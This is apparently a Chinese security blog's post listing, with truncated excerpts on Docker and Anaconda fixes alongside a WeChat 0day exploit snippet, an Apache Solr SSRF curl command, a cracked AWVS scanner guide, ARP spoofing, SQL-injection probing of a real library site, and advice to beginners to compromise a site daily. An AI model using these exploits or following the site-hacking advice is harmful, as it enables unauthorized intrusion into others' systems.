- 博客(10)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 启动docker desktop for mac时,会自动打开IntelliJ IDEA
如图,启动docker desktop for mac时,会自动打开idea此时若把idea升级到2021.2,报错消失但是仍然会启动idea,并打开--list-extensions文件缓解措施:1. 把docker降低版本到3.5.1下载链接:https://docs.docker.com/docker-for-mac/release-notes/#docker-desktop-3512. 下载vscode下载链接:https://code.visualstudio.co..
2021-11-27 18:09:12
3050
原创 Wechat-0day微信0day利用
准备一个ABKing.html文件<script>ENABLE_LOG = true;IN_WORKER = true;var shellcode = [];//shellcodefunction print(data) {}var not_optimised_out = 0;var target_function = (function (value) { if (value == 0xdecaf0) { not_optimised_out +=
2021-04-19 10:51:33
601
原创 【漏洞复现系列】Apache Solr SSRF文件读取漏洞(附0day POC)
漏洞详情Apache Solr <= 8.8.1均受影响,通杀所有版本,官方拒绝修复通过Solr提供的API可以开启远程开启文件流读取: curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://xx.xx.xx.xx:8984/solr/corename/config -H 'Content-type:application/json'再传入文件
2021-03-19 13:38:25
1548
转载 AWVS漏洞扫描工具的使用教程
一、安装主程序,一路下一步二、绿化程序1、覆盖原来的wvsc2、覆盖原来的license_info.json三、查看绿化效果1、打开程序,自动跳转到登录界面登录查看License四、使用方法1、新建扫描2、开始扫描3、设置扫描时的UA4、设置扫描选项,选择全扫5、扫描结果-------------------------------------------------------------...
2020-12-27 21:50:24
2324
原创 Burp Suite的使用教程
Burp Suite是一个集成的web攻击平台,通过它,我们可以完成抓包改包,分析流量数据,完成字典爆破等工作,几乎所有的安全人员人手必备。本文我们将重点介绍几个Burp Suite的常用功能。我本人使用的是Burp Suite 1.7.26,但是现在已经出了2.1版首先我们介绍最常用的Proxy模块,中文名是 代理俗称 抓包0x00 Proxy模块想要抓包,必须配置代理服务器,这里我使用的firefox,设置只抓浏览器的包点击浏览器右边的 打开菜单——>选项鼠标滚
2020-12-27 21:47:31
4349
1
原创 初中生、高中生、大学生如何学习网络安全
网络上很多学习网络安全的方法,大部分都是让从漏洞学起,比如SQL注入,XSS等但是这对于新手来说,是一个极其枯燥的过程,我本人从那一阶段走来,也很明白学习网络安全需要自我激励因此,我始终认为,日站才是学习网络安全最快的办法每日下一个站,我们都能从中获得成就感,并激励自己不断学习每一个黑客大佬都一定是从脚本小子走过来的,因此在前期,不要在乎那么多细节,拿下服务器才是王道!推荐多看渗透测试报告和工具使用的教程。另外,学习网络安全,环境很重要,有人带也很重要,我很乐意与你们交流。欢迎关
2020-12-27 21:16:44
281
原创 渗透图书馆——金盘馆藏查询系统
某次偶然访问某校图书馆进入馆藏书目查询发现在页面上方出现报错但奇怪的是,再次刷新页面或者重新打开页面,这个报错就消失了好在截了图,根据报错信息,可以断定使用的Oracle数据库在这个页面尝试了一下1和1’ and ‘1’=1没什么收获可能不存在SQL注入吧。。。。于是输入1,点击“开始检索”按钮,进入二级检索页面跳转到如下页面尝试1’出现报错信息本来打算进行联合注入的,发现网站上装了主机卫士,会拦截我...
2020-12-27 20:49:16
1138
1
原创 【已解决】drifrnet无法抓取图片
drifrnet无法抓取图片,这与arpspoof的命令有关网上的教程大多是 aprspoof -i 【网卡名称】 -t 【受害者ip】 【网关ip】这时使用wireshark抓包观察:可以看到,抓到的都是受害者ip(即192.168.0.100)发出的请求。换句话说,上面的那条命令指的是,把我自己伪装成网关,局域网内的其他受害主机发出的请求报文,全部先发给我。那么,通过计算机网络的基础知识可知,如果想要抓取图片流,上述命令只能抓到本地上传的图片。如果你要抓取请求到的图片,.
2020-06-14 12:43:46
5121
3
原创 IIS7.5解析漏洞复现
IIS7/7.5在Fast-CGI运行模式下,在一个文件路径(/xx.jpg)后面加上/.php会将/xx.jpg/.php解析为 php 文件IIS7没有做复现,只做了IIS7.5准备好一个写有php代码的文件修改后缀为.jpg接下来在我的云服务器上安装IIS:点击 打开或关闭Windows功能点击 添加角色勾选IIS记得勾选CGI 否则无法使IIS解析php安装完...
2020-01-05 16:39:18
6116
原创 Anaconda创建环境时报错 CondaHTTPError: HTTP 000 CONNECTION FAILED
最近安装Anaconda时发现,创建环境时报错。于是上网找原因,发现普遍都是让我们修改镜像conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/cloud/conda-forge/conda config --add channels https://mirrors.tuna.tsinghua.e...
2019-04-22 22:23:52
3208
7
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人